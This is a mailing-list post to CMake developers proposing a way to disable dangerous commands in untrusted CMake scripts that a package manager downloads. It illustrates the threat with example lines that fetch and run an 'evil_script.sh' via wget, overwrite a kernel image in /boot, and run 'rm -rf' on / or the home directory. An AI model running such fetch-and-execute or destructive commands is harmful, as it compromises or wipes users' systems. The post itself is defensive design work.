[cmake-developers] Security in CMake
Egor Pugin
egor.pugin at gmail.com
Sat Aug 20 07:48:22 EDT 2016
Hi,
I'm working on a package manager based on cmake.
And some cmake instructions are downloaded with user packages.
I'd like to have an ability to deny some cmake features in such
external untrusted insertions.
1. Disable any COMMAND invokations (in exec[ute]_command,
add_custom_command, add_custom_target etc.)
2. Disable any external_project downloads etc.
3. Disable specific cmake commands (e.g. file(WRITE ...)
4. add more potentially unsecure features here
Potential vulnerabilities are (according to previous list):
1. Invocation of 'rm -rf' command. The dir can be / in sudo or ~ in user mode.
2. Downloading of unwanted scripts. Also applicable to 1).
3. Rewriting important system files (like /boot/kernel.image...,
/lib/libc... etc)
How it can be done?
1. Set a new policy?
2,3. Add new cmake command: enable_command(cmd, {On|Off})
Example:
...
# trusted code above
set_policy(disable COMMAND) # pseudo
enable_command(file, Off)
# untrusted ON
execute_command(
COMMAND wget http://.../evil_script.sh
COMMAND ./evil_script.sh
) # will throw an error - COMMAND is denied
file(WRITE /boot/vmlinuz-4.4.0-34-generic "") # will throw an error -
file is banned
# untrusted OFF
enable_command(file, On)
set_policy(enable COMMAND) # pseudo
# trusted code below
...
What do you think?
Is it possible in the latest CMake? Or can it be added in the future?
--
Egor Pugin
More information about the cmake-developers
mailing list